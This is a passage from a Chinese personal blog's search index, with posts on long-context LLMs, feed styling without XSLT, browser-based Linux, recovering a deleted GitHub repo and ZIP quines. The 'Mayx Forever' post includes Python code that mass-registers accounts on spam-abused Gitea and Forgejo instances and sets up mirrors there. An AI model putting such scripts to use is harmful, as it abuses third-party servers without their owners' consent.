1M上下文的使用体验前段时间DeepSeek又出了新的模型，最高可以支持1M长的上下文，而且听说模型规模变小了，所以速度也很快。可惜的是到目前为止还没有开放权重。当然就算开放权重了用2张4090估计也没有足够的显存分配给上下文，至于Mac Studio感觉在长上下文的情况下运行速度应该会很慢……   不过我对这个1M上下文还是挺感兴趣，因为好久之前我写过一篇关于LLM能力上限的文章，在那篇文章中其实我遇到的问题基本上也就是由上下文不足导致的。那既然现在DeepSeek支持了1M的上下文，那我就应该试试之前因为局限性而妥协的一些东西了。   这次我没有用摘要，而是直接把包含整个博客内容的search.json文件上传到DeepSeek，然后向它问了问我的一些问题。试了一下效果非常不错，用摘要会省略的一些细节它基本上都可以展现出来，我试了试让它给我生成一份简历，它甚至在所有文章中找到了我的博客地址、GitHub和邮箱地址，之前用摘要显然是做不到这一点的，这个长上下文还是挺有用啊。   另外我还试了试让它根据文章内容分析十六型人格，并且我自己去答了一遍那个测试，结果也是相同的，说明它真的是在几秒内就读完了我的所有文章而且也完全理解了，真的是非常厉害。   只是拿AI分析我的文章也许只有我自己了😂，实际上根本没人对我感兴趣，也就只有我自己拿来给自己看……当然如果我的博客能比我活得长，不知道会不会有未来人会对我感兴趣呢……总之对于现在肯定是毫无意义了。   除了这些之外，我又试了一下让DeepSeek重构我的Mabbs，这次生成效果看起来很不错了，虽然代码我没细看，不确定能不能运行，但至少没有偷懒只写一点点，一口气写了80KiB多的代码，这也是长上下文带来的好处吧。总之目前这个长上下文的DeepSeek也算是突破了之前我认为的上限，看来LLM真的是前景无限啊。   另外我发现这次更新的DeepSeek居然了解我的博客，我问了一下它“你知道Mayx的博客是哪个博客吗？”，它居然知道，能说出域名，而且还知道我的博客是关于技术的😎，看来这次的训练样本中包含我的信息啊……所以我对这次的更新也挺有好感，毕竟我的知识如果能成为AI的一部分，也算是一种永恒吧。在8GiB内存的MacBook运行的新模型在3年前，我在探索AI时，在我只有8GiB内存的MacBook Pro上运行了非常早期的LLM——Alpaca-7B，那时候7B的LLM虽然能回答一些问题，但答非所问的情况也非常多。不过最近我发现了一个有意思的LLM，叫做LFM2.5-1.2B-Thinking，它只用了12亿的参数就有思维链，而且水平据说还挺强。这么长时间过去之后我倒也想看看我的MacBook能运行多聪明的模型，所以就试着跑了一下它。   运行它也很容易，一般用Ollama就可以，但是Ollama只有TUI，不能渲染Markdown，我也不太想在我的Mac上整WebUI之类的东西……那有什么好的选择吗？我去制作这个模型的公司官网看了一下，他们制作这个模型本就是为了在端侧运行，所以也专门制作了一个软件运行他们的模型，叫做Apollo，在手机和Mac上都可以用。我在我的Mac上安装试了一下，效果很好，首先速度非常快，8bit量化正常情况下可以达到60多Tps，即使是省电模式，也能达到20多Tps。另外加上思维链它的思考能力也还不错，虽然一些脑筋急转弯的题不算擅长，但是正常对话，回答问题之类的表现都很不错，相比于之前7B的模型表现好太多了。当然考虑到都已经过去3年了，能有这样的进步也很正常，不过12亿参数就能有这样的智能还是相当可以啊。   这个模型之所以有这样的能力似乎是因为他们并不完全是Transformer架构，而是使用的一种叫做LFM2的混合架构，按照大家对他们公司（Liquid AI）以及这个架构名字的理解，可能会觉得这个模型基于液态神经网络，不过我让AI看了一下他们的代码似乎并不是，他们用的是一种类似于Mamba的架构，这种架构似乎就很擅长在小参数的模型下比Transformer模型表现的更好，所以说这种变化也是算法进步带来的。   顺便一说这个Apollo除了运行他们自己的模型之外也能连接其他兼容OpenAI接口的模型，正好可以用来连接我的GPT-OSS，这样我就可以不需要下载一些浏览器套壳的重型应用来用我的模型了😝。感想自从ChatGPT之后，AI的发展真是越来越强了，而且能看出来目前甚至并不需要多新多好的硬件就能让一般人获得还不错的智能（当然训练也许还是要大量的硬件），这么看来AI软件的发展还是相当有潜力。目前来看既然优化软件就能做得越来越好，那也许在有限的硬件环境下可以期待无限的智能吧。" },{ "title": "在Google杀死XSLT之后的XML美化方案", "category": "", "tags": "XML, Feed, XSLT, 美化", "url": "/2026/02/08/xslt.html", "date": "2026/02/08", "content": "即使没有了XSLT，也不能让读者看到光秃秃的XML！起因在半年前，我写了一篇用XSLT美化博客XML文件的文章，自从那以后，每次我在浏览其他人博客的时候，都会看一眼对方博客有没有给自己的订阅文件做美化。不过就在前段时间，我在浏览某个博客的时候，发现他博客的订阅文件，甚至连最基本的XML文档树都没有显示出来。这时候我打开开发者工具看了一眼源代码，发现他也并没有使用xml-stylesheet之类的指令……而且控制台貌似报了些错，好像是出现了什么CSP错误……于是我就想，浏览器显示XML文档树的本质，会不会其实也是一种XSLT？之所以报错也有可能是浏览器在自动引用内置的XSLT时违反了CSP。所以我就问了问谷歌AI，结果似乎真的是这样，比如火狐浏览器就内置了一份XSLT文件，IE浏览器也有。正当我为XSLT的功能感到强大时，谷歌AI随后提到，Chrome浏览器决定弃用XSLT，所以以后不要再用XSLT了😰……   我给我的订阅文件加美化功能才半年，怎么就要不能用了？XSLT出现这么多年都还能用，结果等我加上就要废弃了？当时为了增加这个功能，还是费了不少劲的，怎么能让谷歌说没就没？于是我就开始对这件事进行了调查。Google杀死了XSLT从上面Chrome的弃用XSLT文档中，可以发现，这件事的始作俑者是Mason Freed，他在WHATWG中发起了一个Issue，因为XSLT用的人很少，以及实现XSLT的库很老而且容易出漏洞，所以建议把XSLT从Web标准中删除。在这个Issue中可以发现，有很多人表示不满，毕竟这个功能对想要给自己订阅做美化的博主来说还是很有用的。为了对抗谷歌，还有人做了个网站： https://xslt.rip 。   而且XSLT虽然用的人占比也许不高，但从总量上应该还是挺多的，除了用XSLT美化博客订阅的，甚至还有用XSLT作为博客框架的，另外还有一些人提出一部分政府网站也有使用XSLT。   不过Freed看起来对这件事早有准备，他做了一个Polyfill库，通过WASM的方式让XSLT可以正常工作，为了方便大家使用这个库，我顺手给CDNJS发了个PR，以后可以用CDN引用它了。不过使用这个库的前提是需要在订阅中加一段引用JS的代码，像我博客中的Atom订阅，用的是jekyll-feed插件，里面的格式都是写死的，就用不了了……   只不过现在已经没办法阻止谷歌了……而且其他浏览器也表示会跟进，看来我们唯一能做的就是去适应了。没有XSLT之后的美化方案纯CSS虽然XSLT不能用，但不代表xml-stylesheet指令就不能用了，除了XSLT之外，xml-stylesheet同样可以引用CSS。只是似乎完全没见过用CSS美化订阅源的，也许是因为光用CSS能做到的事比较少吧，想用CSS给XML文档加链接之类的估计就做不到了。   但目前能选择的也不多了，既然大家都没写过用CSS美化订阅源，那就让我来写一个吧！然而我并不会写😅……那就只好让AI来写了，我把需求说清楚之后，AI就写出来了：feed.css。试了一下效果还挺不错的，我让AI写的这个版本无论是RSS还是Atom都可以使用，如果有人感兴趣可以拿去用。可惜我的Atom订阅因为用的是插件的原因用不了😭，只能加到用纯Liquid实现的RSS订阅上了。   但用纯CSS的缺点也很明显，没办法操作文档的内容，像修改日期格式的就做不了了，而且也不能添加超链接……XML的标签本身对浏览器来说并没有内建的语义，正常情况下也没法让浏览器把某个标签当作超链接。那难道就没办法了吗？混合XHTML如果完全不能修改XML内容，那确实就没有办法了，但如果能修改XML的内容那还是有办法的，简单来说就是混入XHTML，事实上Freed编写的Polyfill库原理上也是利用了XHTML，只要在能作为XHTML的标签中添加XHTML的命名空间，那么浏览器就可以理解它的语义并渲染，像刚刚用纯CSS美化的订阅没有链接，那就可以在根元素中添加命名空间：xmlns:xhtml=\"http://www.w3.org/1999/xhtml\"，然后在合适的位置写：<xhtml:a href=\"https://example.com\">Read more -></xhtml:a>就可以了。只是这样有个缺点，这样写的订阅文件不够“纯粹”，用验证器验证会显示“Misplaced XHTML content”警告。对有洁癖的人来说可能会有点难受😆。   不过如果能接受这种“不纯粹”，那么其实xml-stylesheet指令也没必要了，link标签一样可以用，包括script也是，所以有人写了一个不使用XSLT美化XML的库。   只不过这种方法和XSLT相比还是有一些缺陷，要知道XSLT的本质是转换，是把XML转换为HTML，也就是说转出来的文档本质是HTML，所有的DOM操作都和操作HTML是完全相同的，但是在XML里混入XHTML标签就不一样了，它的本质依然是XML文档，只是嵌入了XHTML命名空间下的元素，所以相应的DOM操作会有一些不同。如果是自己写的纯JS可能还好，如果是用了jQuery之类假定DOM为HTML的库就会出现问题了，因此这也就是那个Polyfill库的局限性，用正常的XSLT执行document.constructor会显示HTMLDocument，而用这个Polyfill库执行完则是显示XMLDocument。因此，直接套用为浏览器原生XSLT编写的旧样式文件，就有可能会出问题，但如果要考虑改XSLT的话那还不如重新写JS，然后用XHTML引入呢。感想虽然有一些技术会因为各种各样的原因消失，但这不代表我们就要妥协一些东西，总有一些不同的技术可以解决相同的问题，所以我们只需要用其他的技术去实现就好了。不过这也是没办法的事情，毕竟没人能改变浏览器厂商们的决策啊😂。" },{ "title": "年终总结", "category": "", "tags": "总结", "url": "/2026/01/01/summary.html", "date": "2026/01/01", "content": "0 error(s), ∞ warning(s)2025年的状态在2025年，感觉状态不如去年……由于没能做出正确的选择，还是有点糟糕。不过总的来说还没有引发关键性的错误，至少还能继续坚持下去。   在这一年中，感觉记忆和思考能力都有所下滑，看来是没把自己照顾好😂，不过看看这一年写的文章，看起来似乎比以前更流畅了，这也许是因为和AI聊得多了，以至于思维有点偏向AI了吧。   总的来说感觉自己的稳定性还是有点低了，但这可能不是我能独自解决的，也不知会有什么转机……2025年发生的事情回顾了一下去年的年终总结，发现自己还是没能做到知行合一，在这一年里全球各类资产突然开始大幅升值，也就是说钱真的开始不值钱了……那时候想着买黄金，这一年下来却没能下定决心，最终错过了资产保值的机会。至于现在，似乎什么也做不了了……当然这对我的生活并没有造成什么严重的打击，只是感受到环境对自己的影响罢了。   至于AI……依然是一天比一天强，而各个公司对AI的投入相比去年也是极大的提升，当然出来的效果也是非常强，那时候的AI还是挺容易出错，但是现在AI解决问题的能力已经可以替代很多人了，不只是文本生成模型，今年的图像与视频生成模型也真的是发展到了以往完全不能想象的地步，真的可以做到一句话想要什么就有什么了。   另外，今年写的博客内容过于围绕博客本身了，以至于似乎不太跟得上时代，虽然我的博客也确实有点老旧了😆。只是看看以前的文章，都还有一些面向未来的趋势，而今年就有点“考古”了。相比于考古，去展望未来显然是更有意义的事情，只不过……真的感觉脑子不太好使，未来会发生什么，已经完全无法预测了。展望2026年虽然不知道未来会发生什么，但毕竟还没有造成关键性的错误，还有修正的余地，只能希望未来能够做出正确的选择，不要让自己陷入危险的境地吧。" },{ "title": "在浏览器中运行Linux的各种方法", "category": "", "tags": "浏览器, Linux, 虚拟机, WASM", "url": "/2025/12/01/linux.html", "date": "2025/12/01", "content": "浏览器已经无所不能了！起因前段时间跟网友交流时，有人展示了他博客里的一个Linux终端模拟项目：jsnix，看起来挺有意思的，里面甚至还藏了一个CTF。不过我感觉他这个终端和博客本身并没有真正联动起来，本质上只是一个模拟了Linux Shell行为的交互界面。除此之外我还发现了另一个风格类似的个人主页，它虽然也走了终端风格，但功能更简单，还原度也不算高。不过它至少和博客内容做了一些基础联动——尽管目前也只是做到列出文章这种程度😂，当然有这类功能的博客应该也不少，只是我发现的不太多……于是我就想，不如我也给自己的博客加一个类似的“命令行访问”功能，应该会很有趣。当然如果真要做的话，我肯定不会满足于只实现几个模拟指令——既然要做，就要追求真实感，至少得在浏览器上运行真实的Linux终端，才不会让人觉得出戏吧😋。在浏览器中运行Linux虚拟机方案纯JS虚拟机要说到在浏览器上运行Linux，最先想到的应该就是Fabrice Bellard大神写的JSLinux吧，这可能是第一个在浏览器中实现的虚拟机（毕竟是最强虚拟机QEMU的作者编写的）。现在他的个人主页中展示的这个版本是WASM版本，而他最早写的是纯JS实现的。那个JS实现的版本现在在GitHub上有一个去混淆的版本可以用作学习和研究，于是我顺手Fork了一份在GitHub Pages上部署作为演示。   作为纯JS实现的x86虚拟机，性能估计是最差的，但相应的兼容性也最好，在Bellard当年写JSLinux的时候，还没有WASM这种东西呢，所以即使是在不支持WASM的IE11中，也可以正常运行。假如我想把它作为终端用在我的博客上，似乎也是个不错的选择，即使我完全看不懂代码，不知道如何实现JS和虚拟机的通信，它也预留了一个剪贴板设备，可以让我轻松地做到类似的事情，比如我在里面写个Bash脚本，通过它和外面的JS脚本联动来读取我的文章列表和内容，那也挺不错。   当然Bellard用纯JS编写虚拟机也不是独一份，他实现了x86的虚拟机，相应的也有人用纯JS实现了RISC-V的虚拟机，比如ANGEL，看起来挺不错，所以同样也顺手搭了一份。只不过它似乎用了一些更先进的语法，至少IE11上不能运行。   另外还有一个比较知名的项目，叫做jor1k，它模拟的是OpenRISC架构。只是这个架构目前已经过时，基本上没什么人用了，不过这里面还内置了几个演示的小游戏，看起来还挺有意思。   除了这些之外，其实能在浏览器上运行的Linux也不一定是个网页，有一个叫做LinuxPDF的项目可以让Linux运行在PDF中，它的原理和JSLinux差不多，所以需要PDF阅读器支持JS，看它的介绍貌似只能在基于Chromium内核的浏览器中运行，而且因为安全问题在PDF中有很多功能不能用，所以它的速度甚至比JSLinux还要慢，功能还很少，因此它基本上只是个PoC，没什么太大的意义。WASM虚拟机那还有别的方案吗？既然Bellard都选择放弃纯JS的JSLinux而选择了WASM，显然还有其他类似的项目，比如v86，这也是一个能在浏览器中运行的x86虚拟机，不过因为使用了WASM和JIT技术，所以效率要比纯JS的JSLinux高得多。另外作为虚拟机，自然是不止能运行Linux，其他的系统也能运行，在示例中除了Linux之外还有DOS和Windows之类的系统，功能还挺强大，如果能自己做个系统镜像在博客里运行，似乎也是不错的选择。   另外还有一个相对比较知名的叫WebVM，从效果上来说和v86几乎没有区别，同样使用了WASM和JIT技术，也都只支持32位x86，然而它的虚拟化引擎CheerpX是闭源产品，既然和v86都拉不开差距，不知道是谁给他们的信心把它作为闭源产品😅。不过看它的说明文档，其相比于v86的主要区别是实现了Linux系统调用，考虑到它不能运行其他操作系统，而且Linux内核也不能更换，那我想它可能是类似于WSL1的那种实现方案，也许性能上会比v86好一些吧……只不过毕竟是闭源产品，不太清楚具体实现了。   既然纯JS有RISC-V的虚拟机，WASM当然也有，比如WebCM。这个项目相比于其他的项目有个不太一样的地方，它把虚拟机、内核以及镜像打包成了一个单独的WASM文件……只是这样感觉并没有什么好处吧，改起来更加复杂了。   以上这些虚拟机方案各有不同，但是想做一个自己的镜像相对来说还是有点困难，于是我又发现了另一个项目：container2wasm，它可以让一个Docker镜像在浏览器中运行，当然实际实现其实和Docker并没有什么关系，本质还是虚拟机，只是制作镜像的时候可以直接用Docker镜像，方便了不少，但Docker镜像一般也都很大，所以第一次加载可能要下载很长时间。另外它还有一个优势，可以使用Bochs运行x86_64的镜像，不像v86和WebVM只能模拟32位的x86（虽然Bochs的运行效率可能会差一些），而且可以使用WASI直接访问网络，不像以上几个项目如果需要访问网络需要用到中继服务。当然访问网络这个还是要受浏览器本身的跨域策略限制。总之从项目本身来说感觉也算是相当成熟了，尤其能用Docker镜像的话……我甚至可以考虑直接用镜像在线演示我曾经的Mabbs项目😋。纯WASM方案其实想要在浏览器中运行Linux也不一定非得要用虚拟机，用虚拟机相当于是把其他指令集的机器码翻译为WASM，然后浏览器还得再翻译成宿主机CPU支持的指令集，然而WASM本身其实也算是一种指令集，各种编译型语言编写的程序也能编译出WASM的产物，比如FFmpeg。所以Linux内核也完全可以被编译成WASM，正好前段时间我看新闻说Joel Severin做了这么一个项目，对Linux内核做了一些修改使其可以被编译为WASM程序，我试了一下，貌似在Safari浏览器中不能正常工作……Chrome浏览器倒是没问题，不过即使这样用起来BUG也很多，随便执行几条命令就会冻结，体验不是很好。   沿着这个项目，我又找到一个由Thomas Stokes制作的项目，和Joel的项目差不多，但我测了一下可以在Safari上运行，感觉这个项目更完善，不过之前那个项目上了新闻，所以⭐️数比这个更高😂。   于是我把它复制了一份，在我的GitHub Pages上部署了，但直接用仓库中的源代码会显示“Error: not cross origin isolated”，然而在Thomas自己部署的网站中可以正常打开，我看了一眼貌似是因为在GitHub Pages中没有COOP和COEP响应头导致的。Linux作为多任务操作系统来说，当然要运行多个进程，而Linux要管理它们就需要跨线程（Web Worker）读取内存的能力，所以用到了SharedArrayBuffer对象。不过由于CPU曾经出过“幽灵”漏洞，导致现代浏览器默认禁止使用SharedArrayBuffer对象，除非在服务器中配置COOP和COEP响应头才可以用，但是Joel的项目也是在GitHub Pages上运行的啊，为什么可以正常运行？看了源代码后才发现原来可以用Service Worker作为反向代理来给请求的资源加上响应头，他使用的是coi-serviceworker这个项目，所以我也给我部署的代码中加上了这个脚本，总算是解决了这个问题。   部署好这个项目之后我试用了几下，虽然有些操作仍然会导致系统冻结，但相比Joel的版本来说已经好多了。很遗憾的是目前这个WASM Linux还不能和外界通信，所以作用不是很大，另外如果想在里面运行其他二进制程序还是相当困难，首先在WASM中不存在内存管理单元（MMU），不能实现隔离和分页的功能，另外以WASM作为指令集的环境下编译的产物也得是WASM，所以目前来说想用它做点什么还是不太合适。   以上的这两个将Linux内核编译为WASM的方案其实相当于给内核打补丁，然后把浏览器看作是虚拟机来运行，有点像Xen，不过还有一种让Linux原生运行在WASM的项目，它将Linux kernel library编译为了WASM。那么什么是LKL？简单来说它有点像Wine，就和我之前所说的OS模拟器差不多，可以提供一个环境，让程序以为自己在Linux下运行，所以说它和之前的实现有一些不一样，它不存在内核模式，更像是一个普通的程序，而不是系统了。   不过这个项目的体验也比较一般，它无论做什么都得按两次回车，看说明的意思貌似是因为没有实现异步信号传递，所以要手动打断read函数，而且也经常莫名其妙卡住，总体体验不如Thomas的项目。模仿的Linux其实如果只是想做到和Linux类似的功能，也有这样的项目，比如WebContainers，它没有运行Linux系统，但是模拟了一个环境，可以在浏览器中运行Node.js以及Python之类的脚本，而且让脚本以为自己在Linux中运行，除此之外它还能用Service Worker把环境中运行的端口映射给浏览器，可以算是真的把服务端跑在浏览器上了。这个技术还挺高级，不过想想也挺合理，毕竟有WASI，直接编译为WASM的程序也不需要操作系统就能运行，所以用WASM去运行Linux本来就有点多此一举了😂。不过很遗憾的是WebContainers也不是开源软件，要使用它只能引入StackBlitz的资源，而且全网完全没有开源的替代品……也许在浏览器上进行开发本来就是个伪需求，所以没什么人实现吧。   当然如果只是实现和WebContainers类似的功能，JupyterLite也可以实现，它可以在浏览器中像使用本地JupyterLab那样运行JS和Python，还能用Matplotlib、Numpy、Pandas进行数据处理，功能可以说非常强大，而且还是开源软件。只不过它没有模拟操作系统的环境，所以不能运行Node.js项目，也不能提供终端，所以不太符合我想要的效果……总结总的来说，如果想要在博客上搞Linux终端，目前来看似乎虚拟机方案会更靠谱一些，虽然相对来说效率可能比较低，但毕竟目前WASM方案的可靠性还是不够，而且考虑到还需要配置额外的响应头，感觉有点麻烦，当然我觉得WASM还是算未来可期的，如果成熟的话肯定还是比虚拟机要更好一些，毕竟没有转译性能肯定要好不少。至于WebContainers这种方案……等什么时候有开源替代再考虑吧，需要依赖其他服务感觉不够可靠。只是也许我的想法只需要模拟一个合适的文件系统，然后给WASM版的Busybox加个终端就够了？不过这样感觉Bug会更多😂。   至于打算什么时候给博客加上这个功能？应该也是未来可期吧😝，目前还没什么好的思路，仅仅是分享一下在浏览器中运行Linux的各种方法。" },{ "title": "让博客永恒的探索", "category": "", "tags": "Git, Gitea, 镜像, Forever", "url": "/2025/11/01/mirrors.html", "date": "2025/11/01", "content": "Mayx Forever Project – Phase II起因在前段时间，我通过Ecosyste.ms: Repos找到了不少Git平台的实例，也在探索的过程中发现和了解了Tilde社区。当然仅仅是这样显然还不够，里面的实例太多了，显然还有一些其他值得探索的东西。   在我查看这里面的某些Gitea实例时，发现了一些奇怪的事情，有些实例的仓库数和用户数多得离谱，正常来说除了几个大的平台，绝大多数应该只有几十到几百个仓库，这就让我有点好奇了。于是当我点进去之后发现，里面有一大堆仓库都是空的，而且用户名和仓库名都非常有规律，看起来都是一组单词加4位数字命名的，显然这不是正常现象，应该是一种有组织的行为。被SPAM滥用的Git实例于是我就简单看了一下这些异常的仓库和用户的规律，可以发现每个用户都填了个人主页地址，然后个人简介里大都是一段广告词。另外这些个人主页的地址看起来很多都是利用公开可注册的服务，比如开源的有各种Git平台、Wiki，以及论坛，还有一些允许用户写个人主页的新闻网站。在这其中，Git平台大多都没有广告文章，基本上都是通过个人主页地址链接到网站，而Wiki之类的就会写一些篇幅比较长的广告文章。   另外这些平台但凡还在开放注册，就会被以大约每分钟一次的速度自动注册新账号……所以这种事情到底是谁在干呢？我翻了几个仓库，里面的广告多种多样，有些看起来还算正常，还有一些看起来有些黑产。其中我发现有一家叫做“悠闲羊驼SEO”的网站，看介绍主要是给加密货币、对冲基金和博彩网站提供SEO优化的，再加上这些被滥用的平台里也有不少类似的广告，所以我怀疑这些滥用的行为就是这家SEO公司做的（虽然没有证据😂）。永恒的探索看到这么多Git平台被滥用，我就有个想法，之前为了保证可靠性给博客加了不少镜像，除此之外也在互联网档案馆、Software Heritage、Git Protect等存档服务中上传了备份，而且也在IPFS和Arweave等Web3平台上有相应的副本，但是我觉得还不够，再大的平台也有可能会倒闭，IPFS不Pin还会被GC，至于Arweave前段时间看了一眼整个网络才几百个节点，感觉一点也不靠谱……所以我应该好好利用这些平台提高我博客的可靠性。   既然那些Spammer只是为了SEO去滥用这些平台，不如让我利用这些平台给我的博客进行镜像吧！至于使用哪个平台……显然用Git平台方便一些，所以接下来就该考虑一下怎么样分发了。镜像的分发在Git平台中也有很多选择，最知名的是GitLab，不过GitLab有点复杂，接口不太好用……而且很多实例没有开镜像仓库的功能，毕竟如果我每次更新都给一堆仓库推送太费时间了，我打算让各个平台主动从GitHub上拉取我的最新代码。正好Gogs系列的平台基本上都默认支持镜像仓库，不过在我实际使用的时候发现Gogs默认情况下注册要验证码……写识别验证码感觉又挺麻烦，而Gogs的两个分支——Gitea和Forgejo反倒没有……还挺奇怪，所以接下来我的目标主要就是Gitea和Forgejo的实例了。   既然决定好目标，我就得先发现它们了，那些Spammer在注册的时候会在个人主页里写不同的网站，其中也有一些类Gogs平台，那么我可以先找一个Gitea平台，用接口读取这些网站，然后再调类Gogs专属的接口来检测这些网站哪个是类Gogs平台，于是我就写了个脚本来找到它们。   找到这些平台之后就该注册了，还好Gitea和Forgejo默认没有验证码，注册起来也很简单，随便写了个函数实现了一下：def register_account(session, url, email, username, password):    try:        resp = session.get(url + \"/user/sign_up\")        soup = BeautifulSoup(resp.text, \"html.parser\")        csrf_token = soup.find(\"input\", {\"name\": \"_csrf\"}).get(\"value\")        payload = {            \"_csrf\": csrf_token,            \"user_name\": username,            \"email\": email,            \"password\": password,            \"retype\": password,        }        headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}        resp = session.post(url + \"/user/sign_up\", data=payload, headers=headers)        if \"flash-success\" in resp.text:            print(                f\"Successfully registered at {url} with username: {username}, email: {email}, password: {password}\"            )            save_to_file(                \"instances_userinfo.csv\", f\"{url},{username},{email},{password}\"            )            return True        else:            print(f\"Failed to register at {url}.\")            return False    except Exception as e:        print(f\"Error registering at {url}: {e}\")        return False注册完之后就该导入仓库了，只是通过模拟前端发包的方式在Gitea和Forgejo中不同版本的表现可能不太一样，所以我想用API实现，但是API又得有API Key，生成API Key还得模拟前端发包😥……所以怎么都绕不过。   不过这个生成API Key还挺麻烦，有些版本不需要配权限范围，有些配权限的参数还不一样……不过我就是随便一写，凑合用吧，像那些专业的Spammer应该是有更强大的脚本判断各种情况。   最后我还是选择用API导入，又写了个函数：def import_repos(token, url):    try:        response = requests.post(            url=url + \"/api/v1/repos/migrate\",            headers={                \"Authorization\": \"token \" + token,            },            json={                \"repo_name\": \"blog\",                \"mirror_interval\": \"1h\",                \"mirror\": True,                \"description\": \"Mayx's Home Page\",                \"clone_addr\": \"https://github.com/Mabbs/mabbs.github.io\",            },        )        if response.status_code == 201:            print(\"Repository import initiated successfully.\")            save_to_file(\"repo_list.txt\", url + \"/mayx/blog\")            return True        else:            print(f\"Failed to initiate repository import. Status code: {response.status_code}\")            print(f\"Response: {response.text}\")            return False    except Exception as e:        print(f\"Error updating website: {e}\")        return False脚本写好之后我就只需要重复扫描、注册、导入的步骤就行了，这样我的镜像就会越来越多，而且用类Gogs的实例还有一个好处就是不需要我手动推送，它会自动定时拉取我的仓库保持最新，这样也许只要人类文明存在我的博客就会在某处存在吧🤣。   最后我创建的Git镜像可以在这里看到，看起来还是挺壮观啊😋。只不过像这种会被Spammer随便注册的Git平台实例很难说它能活多久，如果没人管而且是云服务器也许到期就没了，有人管的话应该不会允许这么多Spam行为吧……感想不知道用“量”来确保博客的永恒更可靠……还是用“质”的方式更好呢？其实我觉得还得是活动的更好，就像我以前所说的，如果有僵尸网络，自动帮我执行发现并推送的操作，也许比等着这些实例逐渐消失更好吧……只不过那样可能就不太友好了😂。" },{ "title": "一次找回GitHub上被删除仓库的经历", "category": "", "tags": "GitHub, Git, 代码恢复, 软件存档", "url": "/2025/10/12/recover.html", "date": "2025/10/12", "content": "在GitHub中寻找踪迹也许是非常简单的事情……起因前段时间，有人和我聊天的时候提到了Brainfuck语言，让我回想起了高中时写的演讲稿。那时候我在演讲时也介绍了Brainfuck语言。对于Brainfuck的解释器，各种语言都可以实现，不过我当时为了方便理解用了一个在GitHub Pages上的网站，用可视化的方式演示了它的运行过程，效果很不错。现在既然聊到了，自然就想分享一下这个演示的网站，但我正想打开时，发现网站已经404了😰。   在GitHub Pages上的网站都有对应的仓库，现在不仅原仓库消失了，连作者的首页都打不开，看样子是完全退出GitHub了……那么我想找到这个网站的想法就无法实现了吗？不过GitHub有些有意思的特性也许能帮助我找回这个网站。GitHub的特性在GitHub中，一个普通的仓库可能没有什么特别的，也许就是服务器上的一个文件夹。但是当仓库被其他人Fork的时候就不一样了，在执行Fork时，显然GitHub不会完整复制整个仓库。否则，同一个仓库在服务器上会占用双倍空间，这显然不合理。另外，想想Git的结构：它由提交对象和分支指针构成，每次提交都有唯一的Hash值且不会冲突。因此可以推测，GitHub在实现Fork时，所有被Fork的仓库可能共享同一个对象库，而每个用户仓库只保存指针，这样所有仓库只会占用增量空间，而不会存储重复内容。   但这样也会带来一个问题，首先因为很多人可能要共用一部分对象，所以也很难确认对象的所有权，而且也因为这个原因所有的对象要能被所有人访问。因此在整个Fork网络中，只要有一个仓库存在，GitHub就必须保留所有的对象，而且每个仓库都能访问这个网络中所有的对象。为了验证这一点，我们可以用最知名的Linux内核仓库做个示例。   首先对Linux仓库进行Fork，然后我们可以随便做一些改动，比如在README中写“Linux已经被我占领了😆”之类的内容，提交到自己的仓库，并且记下提交的Hash值，接下来就可以把自己的仓库删掉了。如果上面的猜想是正确的，那么在这个Fork网络中的任何一个仓库查看我刚刚的提交应该都可以，于是我直接在主仓库拼上了提交的Hash值（顺便一说只要值唯一，和其他的提交不冲突，短的Hash值也可以），果不其然能找到刚刚修改的内容，这样一来，只要GitHub和任意一个Linux仓库的Fork还存在，这个提交就永远存在了😝。找回仓库那么接下来找回之前网站的方案就很简单了，我只要找到网站仓库的任意一个Fork，然后只要知道最新的提交Hash，我就可以还原最新的仓库了。Fork倒是好找，随便搜一下就能找到一个。这个Fork的最新提交是2016年，但要想找到我当年演讲的版本至少到2018年之后。不过这个Hash值也不太好找，虽然理论上爆破短Hash值也可以，但是感觉太麻烦了，没有那个必要，所以我干脆直接去互联网档案馆看看能找到的最新的仓库页面吧，这样我就能找到它的Hash值了，然后我再把Fork仓库的地址和Hash拼到一起，就看得到最新代码了。   当然，仅仅看到代码还不够。我想Fork这个项目并在自己的GitHub Pages上部署一份。有没有什么好办法可以将我仓库的HEAD指针指向最新的提交呢？其实很简单，首先我要Fork这个Fork仓库，然后Clone我的仓库到本地。不过，此时Clone下来的仓库并不包含GitHub上完整的对象库，因此直接checkout或reset是不行的。这时Hash值就派上用场了，通过fetch拉取对应提交后，就可以进行上述操作。具体命令如下：git fetch origin <commit-hash>git reset --hard <commit-hash>git push origin master最终我就获得了包含最新代码的Brainfuck可视化演示了🎉。结局后来我才知道，原来有一个专门的组织Software Heritage会保存所有代码，根本没必要搞这些花里胡哨的操作😂，像这个仓库也是能很轻易在上面找到，这下以后知道了，再遇到类似情况就可以直接去Software Heritage查找，而不必在互联网档案馆上找线索瞎折腾了🤣。" },{ "title": "关于ZIP Quine与自产生程序的探索", "category": "", "tags": "压缩包, Quine, 自产生程序, Quine Relay", "url": "/2025/09/01/quine.html", "date": "2025/09/01", "content": "描述自己的代码……是一种什么样的感觉？起因前段时间我在折腾博客部署的时候，回顾起了好久以前写的部署脚本。对于全站打包的这个步骤，本来我打算利用这个压缩包结合Service Worker做离线浏览，但因为没有合适的方案所以放弃了。而现在对于这个压缩包，我又有了一个特别的想法。事实上在这个下载全站的压缩包中，里面的内容和实际的网站并不完全相同，因为在这个压缩包里缺少了压缩包本身。所以把这个压缩包解压之后直接当作网站打开，会发现下载压缩包的链接是无效的，除非在解压之后把压缩包移动到网站里才行……   于是我就在想有没有一种可能可以让压缩包解压之后里面又包含了这个压缩包本身？似乎是个不太可能的事情，但我以前听过类似的东西，也许并非不可能？所以这次就来探索一下吧。自包含压缩包的探索在很久之前，我见到过一个很知名的自包含压缩包（又称为ZIP Quine），叫做droste.zip，是由Erling Ellingsen在2005年制作出来的。当时我只知道它很神奇，原理什么的并不清楚，另外在网上也基本上找不到类似的压缩包。现在再回看时发现介绍里包含了一些相关的链接，甚至还有一篇能自己制作类似压缩包的论文，所以接下来就可以看一下这些链接来理解这种压缩包是如何制作的了。   关于原理方面，先看Will Greenberg制作的一个示例，在这里面有一个谜题，使用“print M”（原样输出接下来的M行输入内容）和“repeat M N”（从倒数第N行的输出内容开始，重复M行）这两个指令让最终执行的结果和输入的指令完全相同。这正是对DEFLATE压缩算法所使用的LZ77编码的一种简化模拟，也就是说只要解决了这个问题，就可以让压缩包在解压时原样输出自己了。   这个问题看起来还挺复杂，不过在仓库的Issues就有人给出了几种解法（当然，这个题目解法不唯一），所以在理论上应该是可行的，那么接下来就需要研究压缩文件的格式来实现它了。实现ZIP 